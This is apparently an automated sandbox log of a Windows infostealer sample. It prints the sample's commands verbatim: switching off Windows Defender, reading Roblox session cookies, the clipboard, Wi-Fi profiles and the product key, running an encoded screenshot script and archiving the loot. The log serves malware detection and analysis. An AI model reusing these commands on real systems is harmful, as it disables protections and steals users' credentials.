              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Users\user\Desktop\X9g8L63QGs.exe "C:\Users\user\Desktop\X9g8L63QGs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeSection loaded: powrprof.dllJump to behavior
